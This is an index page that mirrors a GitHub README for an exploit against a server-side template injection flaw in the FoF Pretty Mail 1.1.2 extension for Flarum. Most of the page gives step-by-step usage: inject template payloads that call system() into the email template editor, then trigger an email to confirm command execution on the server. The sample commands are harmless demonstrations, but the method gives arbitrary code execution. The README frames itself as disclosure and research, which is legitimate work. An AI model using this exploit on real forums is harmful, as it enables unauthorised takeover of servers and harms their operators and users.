Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/blue0x1/fof-pretty-mail-ssti-exploit-for-flarum
Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
https://github.com/blue0x1/fof-pretty-mail-ssti-exploit-for-flarum
Last synced: about 2 months ago
JSON representation
Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
- Host: GitHub
- URL: https://github.com/blue0x1/fof-pretty-mail-ssti-exploit-for-flarum
- Owner: blue0x1
- Created: 2024-03-28T17:38:17.000Z (9 months ago)
- Default Branch: main
- Last Pushed: 2024-03-28T17:49:12.000Z (9 months ago)
- Last Synced: 2024-03-29T20:39:21.269Z (9 months ago)
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# FoF Pretty Mail SSTI 1.1.2 Exploit for Flarum
Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
Usage:1. Obtain administrative access to a Flarum forum with the FoF Pretty Mail extension installed.
2. Navigate to the extension settings and access the email template editor.
3. Inject the following payloads into the template:
{{ 7*7 }} (demonstrates basic template expression evaluation)
{{ system('id') }} (executes a system command to display user information)
{{ system('echo "Take The Rose"') }} (executes a custom command)
4. Save the modified template and trigger an email event (e.g., user registration).
5. Observe the execution results in the received email, confirming the successful exploitation.POC:
Editing the E-mail Template
Payload:
```bash
{{ 7*7 }}
{{ system('id') }}
{{ system('echo "Take The Rose"') }}
```![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/116297d3-045f-4d69-be69-a524ad1de63c)
Trigger reset password action ( or any other action) to receive e-mail
![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/f0e0121a-8f32-41be-9ab4-23335fe184dc)
on the email received:
![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/aee3b6c4-fbbe-4a9b-b86e-28ec473028ca)
Disclaimer:
This repository is intended for educational and research purposes only. The exploit is provided to raise awareness about the vulnerability and promote security best practices among Flarum users and developers. Unauthorized use of this exploit against systems without explicit consent is illegal and unethical.